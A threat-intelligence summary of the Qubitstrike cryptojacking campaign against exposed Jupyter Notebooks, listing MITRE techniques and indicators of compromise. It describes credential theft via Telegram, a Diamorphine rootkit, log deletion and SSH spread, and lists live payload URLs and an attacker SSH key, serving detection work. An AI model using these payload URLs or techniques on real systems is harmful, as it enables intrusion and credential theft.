Qubitstrike is a sophisticated cryptojacking campaign targeting exposed Jupyter Notebooks, leveraging Codeberg for payload hosting and Discord for C2, with cloud credentials targeted for later exploitation. The operators deploy XMRig, Diamorphine rootkit, and a Discord-based control plane while exfiltrating credentials via Telegram; notable defense-evading techniques include binary renaming, log deletion, and SSH propagation to extend the attack surface. Hashtags: #Qubitstrike #JupyterNotebooks #Codeberg #Discord #XMRig #Diamorphine #AWS #GoogleCloud
Keypoints
- Qubitstrike targets exposed Jupyter Notebooks and cloud service credential files (AWS, Google Cloud).
- The campaign uses Discord as a C2 and Telegram Bot API for credential exfiltration.
- Initial access is gained via a Jupyter honeypot, with manual-like command activity observed in a Bash shell.
- mi.sh orchestrates mining and persistence, including cron-based persistence and an attacker-controlled SSH key.
- Diamorphine rootkit is deployed (kernel module or LD_PRELOAD) to hide attacker processes.
- Credential harvesting and exfiltration are automated, with found credentials sent to a Telegram bot channel.
MITRE Techniques
- [T1059.004] Unix shell β The malware was first observed to open a Bash session on the Jupyter honeypot, indicating command and scripting activity. β[The attacker] opened a Bash instance using Jupyterβs terminal feature.β]
- [T1105] Ingress Tool Transfer β It downloads and executes the main script via curl from a Codeberg repository, with base64 encoding used to obfuscate the command. β[This downloads and executes the main script used by the attacker. The purpose of base64 encoding the curl command is likely to hide the true purpose of the script from detection.β]
- [T1021.004] SSH β The malware propagates to related hosts via SSH, enabling worm-like spread. β[Propagating the malware to related hosts via SSH]β
- [T1053.005] Cron β It registers persistent cron jobs (apache2, apache2.2, netns, netns2) to run the miner and payloads on reboot or daily. β[Registering cron persistence and inserting a attacker-controlled SSH key]β
- [T1014] Rootkit β The Diamorphine rootkit is retrieved/installed to hide attacker processes, via kernel module and LD_PRELOAD fallback. β[Retrieving and installing the Diamorphine rootkit]β
- [T1070] Indicator Removal on Host β Antiforensics measures delete various Linux log files to cover tracks. β[log_f() performs some antiforensics measures by deleting various Linux log files]β
- [T1071.001] Web Protocols β Discord C2 is used, embedding a Discord bot as the command-and-control channel. β[Discord C2 β¦ uses a Discord bot as a C2]β
- [T1552.001] Credentials in Files β The campaign hunts for cloud provider credential files and exfiltrates them via Telegram. β[Hunts for a number of hardcoded credential files for popular cloud services β¦ exfiltrates these via the Telegram Bot API]β
Indicators of Compromise
- [File Hashes] β mi.sh, kdfs.py, xm64.tar.gz, and 3 more hashes (e.g., 9a5f6318a395600637bd98e83d2aea787353207ed7792ec9911b775b79443dcd; bd23597dbef85ba141da3a7f241c2187aa98420cc8b47a7d51a921058323d327; 96de9c6bcb75e58a087843f74c04af4489f25d7a9ce24f5ec15634ecc5a68cd7).
- [Path] β /usr/share/.LQvKibDTq4, /tmp/.LQvKibDTq4, and 2 more paths (e.g., /usr/local/lib/libnetresolv.so; /bin/zget).
- [URL] β https://codeberg.org/m4rt1/sh/raw/branch/main/xm64.tar.gz, https://codeberg.org/m4rt1/sh/raw/branch/main/killer.sh, and 1 more (https://codeberg.org/m4rt1/sh/raw/branch/main/kill_loop.sh).
- [Wallet] β Crypto wallet ID: 49qQh9VMzdJTP1XA2yPDSx1QbYkDFupydE5AJAA3jQKTh3xUYVyutg28k2PtZGx8z3P2SS7VWKMQUb9Q4WjZ3jdmHPjoJRo.
- [SSH Key] β ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDV+S/3d5qwXg1yvfOm3ZTHqyE2F0zfQv1g12Wb7H4N5EnP1m8WvBOQKJ2htWqcDg2dpweE7htcRsHDxlkv2u+MC0g1b8Z/HawzqY2Z5FH4LtnlYq1QZcYbYIPzWCxifNbHPQGexpT0v/e6z27NiJa6XfE0DMpuX7lY9CVUrBWylcINYnbGhgSDtHnvSspSi4Qu7YuTnee3piyIZhN9m+tDgtz+zgHNVx1j0QpiHibhvfrZQB+tgXWTHqUazwYKR9td68twJ/K1bSY+XoI5F0hzEPTJWoCl3L+CKqA7gC3F9eDs5Kb11RgvGqieSEiWb2z2UHtW9KnTKTRNMdUNA619/5/HAsAcsxynJKYO7V/ifZ+ONFUMtm5oy1UH+49ha//UPWUA6T6vaeApzyAZKuMEmFGcNR3GZ6e8rDL0/miNTk6eq3JiQFR/hbHpn8h5Zq9NOtCoUU7lOvTGAzXBlfD5LIlzBnMA3EpigTvLeuHWQTqNPEhjYNy/YoPTgBAaUJE= root@kali
- [URL] β pool.hashvault.pro:80
Read more: https://www.cadosecurity.com/qubitstrike-an-emerging-malware-campaign-targeting-jupyter-notebooks/